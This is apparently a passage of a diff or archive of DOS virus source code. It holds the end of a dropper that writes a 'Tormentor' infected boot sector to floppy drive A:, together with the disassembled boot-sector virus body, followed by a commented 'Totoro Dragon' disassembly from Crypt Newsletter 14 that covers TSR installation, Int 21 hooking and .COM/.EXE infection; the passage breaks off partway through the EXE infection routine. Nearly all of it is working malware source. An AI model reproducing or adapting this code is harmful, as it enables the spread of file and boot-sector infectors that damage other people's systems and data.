; mov word ptr pspseg,ax ; and save it...
|
||||
|
||||
jmp read_boot
|
||||
|
||||
; mov bx,40h ; Allocate 1024 bytes
|
||||
; call memalloc ; Allocate BX block of memory
|
||||
; jnc read_boot
|
||||
; @disp memerr
|
||||
; jmp quit
|
||||
|
||||
read_boot:
|
||||
@disp read_shit
|
||||
mov ah,08h
|
||||
int 21h
|
||||
mov word ptr bootseg,ax
|
||||
push ax ; Save AX onto the stack
|
||||
mov al,0
|
||||
; mov al,byte ptr drive ; Move current drive into AL
|
||||
xor ah,ah ; Zero out AH
|
||||
; pop ds ; Restore Data_seg
|
||||
pushf ; Save flags
|
||||
mov dx,0 ; Read in sector 0
|
||||
mov cx,1 ; Read in 1 sector
|
||||
mov bx,offset boot_sec ; Store data at DS:boot_sec
|
||||
int 25h ; Read in the disk
|
||||
popf ; clear flags used by flags
|
||||
@disp done
|
||||
mov ah,08h
|
||||
int 21h
|
||||
; assume ds:code_seg ; Restore DS
|
||||
|
||||
begin: @cls 03
|
||||
; mov ah,00 ; Set screen
|
||||
; mov al,03 ; Set screen for 80x25 color
|
||||
; int 10h ; Call BIOS
|
||||
@disp message
|
||||
|
||||
mov ah,08h ; Wait for a keypress
|
||||
int 21h
|
||||
mov cx,3
|
||||
|
||||
read_sector:
|
||||
@disp r_boot ; Display that we are reading the
|
||||
; sector from the disk
|
||||
push cx ; Counter is pushed onto the stack
|
||||
mov ax,201h ; Read in 1 sector
|
||||
mov bx,offset boot_area ; Store it in boot_area
|
||||
mov cx,1 ; Set counter to 1
|
||||
mov dx,0 ; Set for drive 0, head 0
|
||||
int 13h ; Call BIOS
|
||||
pop cx ; Restore counter
|
||||
jnc good_read ; If there were no errors, then
|
||||
; jump to good_read
|
||||
loop read_sector ; Jump back and try reading the sector
|
||||
; again while CX>0
|
||||
@disp r_fail
|
||||
mov ax,4c00h ; Exit
|
||||
int 21h ; Call DOS
|
||||
|
||||
good_read:
|
||||
mov cx,3 ; Set counter to 3
|
||||
@disp paused ; Display message for pause
|
||||
mov ah,08h ; Wait for a key
|
||||
int 21h ; Call DOS
|
||||
|
||||
;*****************************************************************************
|
||||
; Write good sector to track 719 (Head 1, track 27, sector 9)
|
||||
;*****************************************************************************
|
||||
|
||||
write_sector:
|
||||
@disp w_boot ; Display that we are writing the
|
||||
; sector to disk
|
||||
mov ax,301h ; Set for writing the boot sector
|
||||
mov bx,offset boot_area ; Set buffer to what we read in
|
||||
; mov bx,offset infected_data
|
||||
mov cx,2709h ; Set counter to 2709h
|
||||
mov dx,100h ; Head 1, drive 0
|
||||
int 13h ; Call BIOS
|
||||
pop cx ; Restore the counter
|
||||
jnc good_write ; If we wrote the sectors allright,
|
||||
; then jump to good_write
|
||||
loop write_sector
|
||||
@disp w_fail
|
||||
mov ax,4c00h ; Exit
|
||||
int 21h ; Call DOS
|
||||
|
||||
good_write:
|
||||
mov cx,3 ; Copy 3 into CX
|
||||
@disp w_vir
|
||||
infect_floppy:
|
||||
push cx ; Push it onto the stack
|
||||
mov ax,301h ; Write 1 sector
|
||||
mov bx,offset infected_data ; Write corrupt boot sector to the
|
||||
; drive
|
||||
mov cx,1 ; Set counter to 1
|
||||
mov dx,0 ; Set for drive A:
|
||||
int 13h ; Call BIOS
|
||||
jnc good_infection ; If there are no problems, then
|
||||
; continue
|
||||
loop infect_floppy ; Otherwise, try again until CX=0
|
||||
@disp f_infec ; If CX=0, then display the message
|
||||
; and then exit
|
||||
mov ax,4c00h ; Exit
|
||||
int 21h ; Call DOS
|
||||
|
||||
good_infection:
|
||||
@disp succ
|
||||
mov ax,4c00h
|
||||
int 21h
|
||||
|
||||
;*****************************************************************************
|
||||
; The following is a copy of the infected boot sector to copy to sector 0
|
||||
;*****************************************************************************
|
||||
|
||||
infected_data db 0EBh, 34h
|
||||
nop
|
||||
dec cx
|
||||
inc dx
|
||||
dec bp
|
||||
and [bx+si],ah
|
||||
xor bp,word ptr ds:[33h]
|
||||
add al,[bp+si]
|
||||
add [bx+si],ax
|
||||
add dh,[bx+si+0]
|
||||
rol byte ptr [bp+si],1 ; Rotate
|
||||
std ; Set direction flag
|
||||
add al,[bx+si]
|
||||
or [bx+si],ax
|
||||
add al,[bx+si]
|
||||
db 19 dup (0)
|
||||
; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
|
||||
adc al,[bx+si]
|
||||
add [bx+si],al
|
||||
add [bx+di],al
|
||||
add dl,bh
|
||||
xor ax,ax ; Zero register
|
||||
mov ds,ax
|
||||
mov ss,ax
|
||||
mov bx,7C00h ; Pointer to boot segment
|
||||
mov sp,bx
|
||||
push ds
|
||||
data_14 db 53h
|
||||
dec word ptr ds:[413h]
|
||||
int 12h ; Put (memory size)/1K in ax
|
||||
mov cl,6
|
||||
shl ax,cl ; Shift w/zeros fill
|
||||
mov es,ax
|
||||
xchg ax,word ptr ds:[4Eh]
|
||||
mov word ptr ds:[7DABh],ax
|
||||
mov ax,128h
|
||||
xchg ax,word ptr ds:[4Ch]
|
||||
mov word ptr ds:[7DA9h],ax
|
||||
mov ax,es
|
||||
xchg ax,word ptr ds:[66h]
|
||||
mov word ptr ds:[7DAFh],ax
|
||||
mov ax,0BBh
|
||||
xchg ax,word ptr ds:[64h]
|
||||
mov word ptr ds:[7DADh],ax
|
||||
xor di,di ; Zero register
|
||||
mov si,bx
|
||||
mov cx,100h
|
||||
cld ; Clear direction
|
||||
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
|
||||
sti ; Enable interrupts
|
||||
push es
|
||||
mov ax,85h
|
||||
push ax
|
||||
retf
|
||||
push bx
|
||||
xor dl,dl ; Zero register
|
||||
call sub_2 ; (00FB)
|
||||
pop bx
|
||||
push ds
|
||||
pop es
|
||||
mov ah,2
|
||||
mov dh,1
|
||||
call sub_6 ; (011F)
|
||||
jc loc_2 ; Jump if carry Set
|
||||
push cs
|
||||
pop ds
|
||||
mov si,offset ds:[0Bh]
|
||||
mov di,offset ds:[7C0Bh]
|
||||
mov cx,2Bh
|
||||
cld ; Clear direction
|
||||
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
|
||||
jz loc_ret_3 ; Jump if zero
|
||||
loc_2:
|
||||
pop bx
|
||||
pop ax
|
||||
push cs
|
||||
mov ax,0AFh
|
||||
push ax
|
||||
|
||||
loc_ret_3:
|
||||
retf ; Return far
|
||||
read_error:
|
||||
push cs
|
||||
pop ds
|
||||
mov si,1DBh
|
||||
call sub_1 ; (00DA)
|
||||
xor ah,ah ; Zero register
|
||||
int 16h ; Keyboard i/o ah=function 00h
|
||||
; get keybd char in al, ah=scan
|
||||
xor ax,ax ; Zero register
|
||||
int 13h ; Disk dl=drive a ah=func 00h
|
||||
; reset disk, al=return status
|
||||
push cs
|
||||
pop es
|
||||
mov bx,offset ds:[200h]
|
||||
mov cx,6
|
||||
xor dx,dx ; Zero register
|
||||
mov ax,201h
|
||||
int 13h ; Disk dl=drive a ah=func 02h
|
||||
; read sectors to memory es:bx
|
||||
jc read_error ; Jump if carry Set
|
||||
mov cx,0FF0h
|
||||
mov ds,cx
|
||||
jmp dword ptr cs:data_16
|
||||
|
||||
;
|
||||
; Insert Tormentor endp here...
|
||||
;
|
||||
;tormentor endp
|
||||
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_1 proc near
|
||||
loc_5:
|
||||
mov bx,7
|
||||
cld ; Clear direction
|
||||
lodsb ; String [si] to al
|
||||
or al,al ; Zero ?
|
||||
jz loc_ret_9 ; Jump if zero
|
||||
jns loc_6 ; Jump if not sign
|
||||
xor al,0D7h
|
||||
or bl,88h
|
||||
loc_6:
|
||||
cmp al,20h
|
||||
jbe loc_7 ; Jump if below or =
|
||||
mov cx,1
|
||||
mov ah,9 ;
|
||||
int 10h ; Video display ah=functn 09h
|
||||
; set char al & attrib bl @curs
|
||||
loc_7:
|
||||
mov ah,0Eh
|
||||
int 10h ; Video display ah=functn 0Eh
|
||||
; write char al, teletype mode
|
||||
jmp short loc_5 ; (00DA)
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_2:
|
||||
mov bx,200h
|
||||
mov cx,2
|
||||
mov ah,cl
|
||||
call sub_5 ; (011D)
|
||||
mov cx,2709h
|
||||
xor byte ptr es:[bx],0FDh
|
||||
jz loc_8 ; Jump if zero
|
||||
mov cx,4F0Fh
|
||||
loc_8:
|
||||
jmp short loc_ret_9 ; (0127)
|
||||
nop
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_3:
|
||||
mov ah,2
|
||||
mov bx,200h
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_4:
|
||||
mov cx,1
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_5:
|
||||
mov dh,0
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_6:
|
||||
mov al,1
|
||||
|
||||
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
|
||||
sub_7:
|
||||
pushf ; Push flags
|
||||
call dword ptr cs:data_15
|
||||
|
||||
loc_ret_9:
|
||||
retn
|
||||
sub_1 endp
|
||||
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push es
|
||||
push ds
|
||||
push si
|
||||
push di
|
||||
pushf ; Push flags
|
||||
push cs
|
||||
pop ds
|
||||
cmp dl,1
|
||||
ja loc_11 ; Jump if above
|
||||
and ax,0FE00h
|
||||
jz loc_11 ; Jump if zero
|
||||
xchg al,ch
|
||||
shl al,1 ; Shift w/zeros fill
|
||||
add al,dh
|
||||
mov ah,9
|
||||
mul ah ; ax = reg * al
|
||||
add ax,cx
|
||||
sub al,6
|
||||
cmp ax,6
|
||||
ja loc_11 ; Jump if above
|
||||
push cs
|
||||
pop es
|
||||
call sub_3 ; (0115)
|
||||
jc loc_10 ; Jump if carry Set
|
||||
mov di,offset data_14
|
||||
mov si,offset ds:[243h]
|
||||
mov cx,0Eh
|
||||
std ; Set direction flag
|
||||
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to
|
||||
; es:[di]
|
||||
jz loc_11 ; Jump if zero
|
||||
sub si,cx
|
||||
sub di,cx
|
||||
mov cl,33h ; '3'
|
||||
rep movsb ; Rep when cx >0 Mov [si] to
|
||||
; es:[di]
|
||||
call sub_2 ; (00FB)
|
||||
push cx
|
||||
push bx
|
||||
call sub_3 ; (0115)
|
||||
mov ah,3
|
||||
xor bx,bx ; Zero register
|
||||
call sub_4 ; (011A)
|
||||
pop bx
|
||||
pop cx
|
||||
jc loc_10 ; Jump if carry Set
|
||||
mov dh,1
|
||||
mov ah,3
|
||||
call sub_6 ; (011F)
|
||||
loc_10:
|
||||
xor ax,ax ; Zero register
|
||||
call sub_7 ; (0121)
|
||||
loc_11:
|
||||
mov ah,4
|
||||
int 1Ah ; Real time clock ah=func 04h
|
||||
; read date cx=year, dx=mon/day
|
||||
cmp dh,9
|
||||
jne not_month ; Jump if not equal
|
||||
mov si,1B1h
|
||||
call sub_1 ; (00DA)
|
||||
not_month:
|
||||
popf ; Pop flags
|
||||
pop di
|
||||
pop si
|
||||
pop ds
|
||||
pop es
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
jmp dword ptr cs:data_15
|
||||
data_15 dd 0C602EC59h
|
||||
data_16 dd 0F000E6F2h
|
||||
esc 2,ch ; coprocessor escape
|
||||
and [bp+di-4141h],al
|
||||
movsb ; Mov [si] to es:[di]
|
||||
idiv word ptr [bp-85Ch] ; ax,dxrem=dx:ax/data
|
||||
xchg ax,si
|
||||
mov si,offset ds:[0B4A5h]
|
||||
mov ax,0DAA7h
|
||||
esc 5,[bx+si] ; coprocessor escape
|
||||
db 'IO SYSMSDOS SYS', 0Dh, 0Ah
|
||||
db 'Non-system disk or disk error', 0Dh
|
||||
db 0Ah
|
||||
add [bx+si],al
|
||||
push bp
|
||||
; jmp cont
|
||||
|
||||
; db 'Tormentor Strain A - RABID Nat''nl Development Corp.'
|
||||
stosb
|
||||
;cont: stosb ; Store al to es:[di]
|
||||
|
||||
tormentor endp
|
||||
|
||||
quit: mov ax,4c00h
|
||||
int 21h
|
||||
|
||||
|
||||
code_seg ends
|
||||
end start
|
||||
|
||||
|
@ -0,0 +1,713 @@
;TOTORO DRAGON disassembly. Included, for your pleasure, in Crypt
|
||||
;Newsletter 14. Profuse thanks to Stormbringer, wherever he is.
|
||||
|
||||
;***************************************************************************
|
||||
;* The Totoro Dragon Virus from Taiwan *
|
||||
;***************************************************************************
|
||||
;* This virus is a fairly simple resident .EXE/.COM infector. It goes *
|
||||
;*resident by re-executing the infected file and using Int 21, function 31.*
|
||||
;*When it infects a .COM, it puts itself at the beginning of the file and *
|
||||
;*starts the host at an offset of 600h (700h in memory), giving the virus *
|
||||
;*an effective length of 1536 bytes, plus an extra 4 bytes for its marker *
|
||||
;*at the end ("YTIT"). It infects .EXE files using the "standard" method. *
|
||||
;*While it does save file attributes, the time and date change when a file *
|
||||
;*is infected. The virus activates on Saturdays. When active, it installs*
|
||||
;*an Int 08 (Timer click) handler that counts to 0CCCh, then shoves the *
|
||||
;*text off the screen and prints the following in the upper left-hand *
|
||||
;*corner: *
|
||||
;* *
|
||||
;* ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ· *
|
||||
;* º Totoro Dragon º *
|
||||
;* ºHello! I am TOTORO CATº *
|
||||
;* º Written by Y.T.J.C.T º *
|
||||
;* º in Ping Tung. TAIWAN º *
|
||||
;* º Don't Worry,be Happy º *
|
||||
;* ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ *
|
||||
;* *
|
||||
;*It then restarts the counter and does it again. Other that this effect, *
|
||||
;*the virus seems relatively harmless. *
|
||||
;* *
|
||||
;* *
|
||||
;* Disassembly by Stormbringer *
|
||||
;***************************************************************************
|
||||
.model tiny
|
||||
.radix 16
|
||||
.code
|
||||
org 100h
|
||||
|
||||
start:
|
||||
jmp short COM_Entry_Point
|
||||
nop
|
||||
;***************************************************************************
|
||||
;* Data Tables *
|
||||
;***************************************************************************
|
||||
File_Size_Off dw 5
|
||||
File_Size_Seg dw 0
|
||||
TSR_DAT dw 4262h
|
||||
DS_Save dw 0F21h
|
||||
ES_Save dw 0F21h
|
||||
File_Attribs dw 20h
|
||||
IP_Save dw 0
|
||||
CS_Save dw 0F99
|
||||
SP_Save dw 0
|
||||
SS_Save dw 0
|
||||
File_Type db 'C'
|
||||
|
||||
Wasted_Space db 0, 0, 0 ;?
|
||||
|
||||
;********************************************
|
||||
; EXE_Header ;
|
||||
;********************************************
|
||||
EXE_Sig db 'MZ'
|
||||
Last_Page_Len dw 14h
|
||||
EXE_Size dw 5
|
||||
Rel_Tbl_Items dw 0
|
||||
Header_Size dw 20h
|
||||
Minalloc dw 0
|
||||
Maxalloc dw 0ffff
|
||||
Init_SS dw 1
|
||||
Init_SP dw 700h
|
||||
Checksum dw 0
|
||||
Init_IP dw 91h
|
||||
Init_CS dw 1
|
||||
First_Rel dw 001Eh
|
||||
Overlay_Num dw 0
|
||||
;********************************************
|
||||
|
||||
CS_Store dw 0
|
||||
Command db 'COMMAND.COM', 0
|
||||
db 00h, 80h, 00h
|
||||
ES_Store_1 dw 0F21h
|
||||
dw 5Ch
|
||||
ES_Store_2 dw 0F21h
|
||||
dw 6Ch
|
||||
ES_Store_3 dw 0F21h
|
||||
File_Handle dw 5
|
||||
|
||||
Buffer_For_Checks db 0
|
||||
db 4Ch,0CDh, 21h
|
||||
|
||||
File_Name_Off dw 469h
|
||||
File_Name_Seg dw 0DF5h
|
||||
db 0
|
||||
Mem_Seg dw 0F93h
|
||||
IP_24 dw 156h
|
||||
CS_24 dw 0DF5h
|
||||
|
||||
;************************************************************************
|
||||
;* Virus Entry Point #1 (COM) *
|
||||
;************************************************************************
|
||||
COM_Entry_Point:
|
||||
mov ax,0F1F1h ;Is the virus in memory?
|
||||
int 21h
|
||||
mov cs:CS_Store,0
|
||||
mov cs:[ES_Save],es
|
||||
cmp ax,0F1F1h ;AX preserved?
|
||||
je Already_Installed ;Same? go Already_Installed
|
||||
jmp Install_Virus ;Not In Mem? go Install_Virus
|
||||
|
||||
Already_Installed: ;Restore control to host file (COM)
|
||||
mov ax,cs
|
||||
mov es,ax ;ES = DS = CS
|
||||
mov ds,ax
|
||||
mov ah,0CBh ;Restore Control
|
||||
mov si,700h ;Offset of host in file
|
||||
mov di,100h ;Original offset of host
|
||||
mov cx,cs:[File_Size_Off] ;Size of host file
|
||||
|
||||
int 21h ;Call internal routine to restore control
|
||||
;to host .COM file.
|
||||
|
||||
;************************************************************************
|
||||
;* Virus Entry Point #2 (EXE) *
|
||||
;************************************************************************
|
||||
EXE_Entry_Point:
|
||||
mov ax,cs
|
||||
sub ax,10h
|
||||
push ax
|
||||
mov ax,offset After_Jump
|
||||
push ax
|
||||
retf ;Jump to After_Jump with
|
||||
;original .COM offsets.
|
||||
After_Jump:
|
||||
mov cs:[ES_Save],es
|
||||
mov cs:[DS_Save],ds
|
||||
mov ax,0F1F1h
|
||||
int 21h
|
||||
cmp ax,0F1F1h ;Check if installed.
|
||||
jne Get_New_Seg ;Nope, Install....
|
||||
|
||||
cli
|
||||
mov ax,cs:[SS_Save] ;Yes, restore host regs
|
||||
add ax,10h
|
||||
mov bx,es
|
||||
add ax,bx
|
||||
mov ss,ax
|
||||
mov sp,cs:[SP_Save]
|
||||
sti
|
||||
|
||||
mov ax,cs:[CS_Store]
|
||||
mov bx,es
|
||||
add ax,bx
|
||||
add ax,10h
|
||||
mov word ptr cs:[IP_Save+2],ax
|
||||
jmp dword ptr cs:[IP_Save] ;Restore Control to
|
||||
;.EXE host.
|
||||
|
||||
Get_New_Seg:
|
||||
push es ;For later RETF
|
||||
xor ax,ax
|
||||
mov ds,ax ;DS = 0
|
||||
|
||||
;****************************************************************************
|
||||
;*NOTE: From 0:200 to 0:400 there is some "empty" space, as it is the upper *
|
||||
;* (unused) part of the interrupt tables. This virus uses the top three*
|
||||
;* bytes, i.e. the INT 99 entry, to run a repnz movsb command followed *
|
||||
;* by a retf. This is to copy the virus to a new segment in memory and*
|
||||
;* jump to it. *
|
||||
;****************************************************************************
|
||||
|
||||
mov word ptr ds:[3fdh],0A4F3h ;repnz movsb
|
||||
mov byte ptr ds:[3ffh],0CBh ;retf
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov si,100h
|
||||
mov di,si ;Copy virus to new segment
|
||||
mov cx,600h ;and "RETF" to
|
||||
mov ax,offset Install_Virus ;Install_Virus in new copy
|
||||
push ax
|
||||
db 0EAh,0FDh, 03h, 00h, 00h ;Jump far 0:3FDh
|
||||
|
||||
Install_Virus:
|
||||
cli ;Disable interrupts
|
||||
push cs
|
||||
pop ds
|
||||
mov ah,2Ah
|
||||
int 21h ;Get Day/Date
|
||||
|
||||
cmp al,6 ;Is it Saturday?
|
||||
jne Set_Int_21 ;Nope, don't activate, just
|
||||
mov ax,3508h ;infect files.
|
||||
int 21h ;Get Int 08 address
|
||||
|
||||
mov word ptr cs:[IP_08],bx
|
||||
mov word ptr cs:[CS_08],es
|
||||
mov dx,offset Int_08
|
||||
mov ax,2508h
|
||||
int 21h ;Set Int 08
|
||||
|
||||
Set_Int_21:
|
||||
mov ax,3521h
|
||||
int 21h ;Get Int 21 address
|
||||
|
||||
mov word ptr cs:[IP_21],bx
|
||||
mov word ptr cs:[CS_21],es
|
||||
mov dx,offset Int_21
|
||||
mov ax,2521h
|
||||
int 21h ;Set Int_21
|
||||
|
||||
mov es,cs:[ES_Save]
|
||||
cmp cs:[TSR_DAT],426Bh ;Second Execute?
|
||||
je Go_TSR ;Yep, go TSR
|
||||
|
||||
mov bx,1000h ;Nope, set up for second exec.
|
||||
mov ah,4Ah
|
||||
int 21h ;Change Mem Allocation
|
||||
;to 64k.
|
||||
|
||||
mov es,es:[2ch] ;Environment string
|
||||
xor di,di
|
||||
xor al,al
|
||||
mov cx,7FFFh
|
||||
|
||||
Find_Filename: ;Search Environment for
|
||||
repne scasb ;filename of host.
|
||||
cmp es:[di],al
|
||||
loopnz Find_Filename
|
||||
|
||||
add di,3 ;Skip drive designator
|
||||
;i.e. "C:\" in
|
||||
;"C:\Infected.EXE"
|
||||
mov dx,di
|
||||
|
||||
push es
|
||||
pop ds ;DS:DX = host filename
|
||||
push cs
|
||||
pop es
|
||||
|
||||
cli ;Clears Ints (so none can
|
||||
;disrupt second execution
|
||||
;of virus)
|
||||
|
||||
mov ax,cs:[ES_Save]
|
||||
mov cs:[ES_Store_1],ax
|
||||
mov cs:[ES_Store_2],ax
|
||||
mov cs:[ES_Store_3],ax
|
||||
mov bx,144h
|
||||
mov ax,4B00h ;Re-Execute the file
|
||||
pushf
|
||||
call dword ptr cs:[IP_21] ;Call Int 21 to Execute file.
|
||||
|
||||
Go_TSR:
|
||||
mov ah,31h
|
||||
mov dx,71h
|
||||
int 21h ;Terminate and Stay Resident.
|
||||
|
||||
Int_21:
|
||||
pushf ;Push flags
|
||||
cmp ax,0F1F1h ;Is it an Install Check?
|
||||
jne Is_It_Execute ;No, Go Is_It_Execute
|
||||
mov ax,0F1F1h ;Yes, save value (unneccesary)
|
||||
popf
|
||||
iret ;Return to virus in program.
|
||||
|
||||
Is_It_Execute:
|
||||
cmp ax,4B00h ;Is it a Load & Execute call?
|
||||
jne Restore_Host ;Nope, continue on.
|
||||
call execute ;Infect the file if possible.
|
||||
jmp short Go_Int_21 ;And go to old Int 21 handler.
|
||||
nop
|
||||
Restore_Host:
|
||||
cmp ah,0CBh ;Is it a request to restore
|
||||
jne Go_Int_21 ;control to host?
|
||||
pop ax ax ;Pop flags + Old IP (not kept)
|
||||
mov word ptr cs:[IP_Save],100h
|
||||
pop ax
|
||||
mov word ptr cs:[IP_Save+2],ax
|
||||
rep movsb ;Restore Host to orig. Pos.
|
||||
popf ;Completely remove old Int call
|
||||
mov ax,0
|
||||
jmp dword ptr cs:[IP_Save] ;Jump to Host:100
|
||||
Go_Int_21:
|
||||
popf ; Pop flags
|
||||
|
||||
db 0ea ;Jump to Int 21
|
||||
IP_21 dw 040ebh
|
||||
CS_21 dw 0011
|
||||
|
||||
|
||||
execute:
|
||||
push es ds ax bx cx dx si di
|
||||
mov cs:[File_Name_Seg],ds
|
||||
mov cs:[File_Name_Off],dx
|
||||
mov ax,3524h ;Get Int 24 Address
|
||||
int 21h ;(Critical Error)
|
||||
|
||||
mov cs:[IP_24],bx
|
||||
mov cs:[CS_24],es
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset Int_24
|
||||
mov ax,2524h
|
||||
int 21h ;Set Int 24
|
||||
|
||||
mov ds,cs:[File_Name_Seg]
|
||||
mov si,cs:[File_Name_Off]
|
||||
|
||||
Name_Check:
|
||||
lodsb
|
||||
or al,al ;Is the first byte a zero?
|
||||
jnz Name_Check ;Nope, find end of string
|
||||
mov al,[si-2]
|
||||
and al,0DFh
|
||||
cmp al,4Dh ;'M'
|
||||
je Is_Com ;COM file, jump Is_Com
|
||||
cmp al,45h ;'E'
|
||||
je Is_EXE ;EXE file, jump Is_EXE
|
||||
jmp Clean_Up ;Neither? Go Clean_Up
|
||||
Is_Com:
|
||||
mov cs:[File_Type],'C' ;Save File type for later.
|
||||
jmp short Check_If_Command
|
||||
nop
|
||||
Is_EXE:
|
||||
mov cs:[File_Type],'E'
|
||||
|
||||
Check_If_Command:
|
||||
sub si,0Ch
|
||||
mov di,offset Command
|
||||
push cs
|
||||
pop es
|
||||
mov cx,0Bh ;Is it Command.COM?
|
||||
repe cmpsb
|
||||
jnz Start_Infect ;No, Jump Start_Infect
|
||||
Got_An_Error:
|
||||
jmp Clean_Up ;Is Command, get otta here.
|
||||
|
||||
Start_Infect:
|
||||
mov ds,cs:[File_Name_Seg]
|
||||
mov dx,cs:[File_Name_Off]
|
||||
mov ax,4300h
|
||||
int 21h ;Get Attribs
|
||||
|
||||
jc Got_An_Error
|
||||
mov cs:[File_Attribs],cx
|
||||
xor cx,cx
|
||||
mov ax,4301h
|
||||
int 21h ;Zero Attrib's for read/write
|
||||
|
||||
jc Got_An_Error
|
||||
mov ax,3D02h
|
||||
int 21h ;Open Read/Write
|
||||
|
||||
jnc Check_Infect ;Everything Fine? go Check_Infect
|
||||
jmp Reset_Attribs ;Couldn't Open, go Reset_Attribs
|
||||
|
||||
Check_Infect:
|
||||
mov bx,ax
|
||||
mov cs:[File_Handle],ax
|
||||
mov cx,0FFFFh
|
||||
mov dx,0FFFCh
|
||||
mov ax,4202h
|
||||
int 21h ;Move to 4 bytes from end
|
||||
|
||||
add ax,4
|
||||
mov cs:[File_Size_Off],ax
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset Buffer_For_Checks
|
||||
mov cx,4
|
||||
mov ah,3Fh
|
||||
int 21h
|
||||
;Read in Last 4 bytes of file
|
||||
push cs
|
||||
pop es
|
||||
mov cx,4
|
||||
mov si,offset Marker ;are last 4 bytes 'YTIT'?
|
||||
mov di,offset Buffer_For_Checks ;
|
||||
repe cmpsb
|
||||
jnz Check_Which_Type ;Not infected? Go Check_Which_Type
|
||||
jmp Close_File ;Infected? Go Close_File
|
||||
|
||||
Check_Which_Type:
|
||||
cmp cs:[File_Type],'C' ;Is it a .COM?
|
||||
je COM_Infect ;Yes, go COM_Infect
|
||||
jmp EXE_Infect ;No, go EXE_Infect
|
||||
|
||||
COM_Infect:
|
||||
mov ah,48h
|
||||
mov bx,1000h
|
||||
int 21h ;Allocate 64k of memory
|
||||
|
||||
jnc Load_In_File ;No Prob? Go Load_In_File
|
||||
jmp Close_File ;Otherwise, go Close_File
|
||||
|
||||
Load_In_File:
|
||||
mov cs:[Mem_Seg],ax
|
||||
mov bx,cs:[File_Handle]
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h
|
||||
int 21h ;Go to beginning of file
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
mov es,cs:[Mem_Seg]
|
||||
|
||||
mov si,100
|
||||
|
||||
mov di,si
|
||||
mov cx,700h
|
||||
rep movsb
|
||||
mov ds,cs:Mem_Seg
|
||||
mov cx,cs:[File_Size_Off]
|
||||
mov dx,700h
|
||||
mov ah,3Fh ;Load entire file to directly
|
||||
int 21h ;after virus.
|
||||
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h
|
||||
int 21h ;Move to the beginning of file
|
||||
|
||||
mov dx,100h
|
||||
mov cx,cs:[File_Size_Off]
|
||||
add cx,600h
|
||||
mov ah,40h
|
||||
int 21h ;Write entire file back to disk
|
||||
|
||||
jc Go_Release_Mem
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4202h
|
||||
int 21h ;Move to end of file
|
||||
|
||||
mov cs:[File_Size_Seg],0 ;COM < 64k
|
||||
add ax,4 ;Add 4 for marker bytes
|
||||
mov cs:[File_Size_Off],ax ;Save file size
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset Marker
|
||||
mov cx,4
|
||||
mov ah,40h
|
||||
int 21h ;Write in marker 'YTIT'
|
||||
|
||||
Go_Release_Mem:
|
||||
jmp Release_Mem
|
||||
jmp Close_File
|
||||
|
||||
EXE_Infect:
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h
|
||||
int 21h ;Move to beginning of file
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
db 8dh,16h,1bh,01 ;lea dx,cs:[11Bh]
|
||||
mov cx,1Ch
|
||||
mov ah,3Fh
|
||||
int 21h ;Read in .EXE header
|
||||
|
||||
Save_Header_NFO:
|
||||
cli ;clear ints
|
||||
mov ax,cs:[Init_CS]
|
||||
mov cs:[CS_Store],ax ;Save old CS
|
||||
mov ax,cs:[Init_IP]
|
||||
mov word ptr cs:[IP_Save],ax ;Save old IP
|
||||
mov ax,cs:[Init_SS]
|
||||
mov cs:[SS_Save],ax ;Save old SS
|
||||
mov ax,cs:[Init_SP]
|
||||
mov cs:[SP_Save],ax ;Save old SP
|
||||
sti ;restore ints
|
||||
|
||||
xor ax,ax
|
||||
cmp cs:[Last_Page_Len],0
|
||||
je Calculate_Exe_Header
|
||||
dec cs:[EXE_Size]
|
||||
|
||||
Calculate_Exe_Header: ;Long, drawn out way
|
||||
;to calculate new EXE header
|
||||
mov cx,200h
|
||||
xor dx,dx
|
||||
mov ax,cs:[EXE_Size]
|
||||
mul cx
|
||||
add ax,cs:[Last_Page_Len]
|
||||
add ax,0Fh
|
||||
adc dx,0
|
||||
and ax,0FFF0h
|
||||
mov cs:[File_Size_Off],ax
|
||||
mov cs:[File_Size_Seg],dx
|
||||
push dx ax dx ax
|
||||
xor dx,dx
|
||||
mov ax,cs:[Header_Size]
|
||||
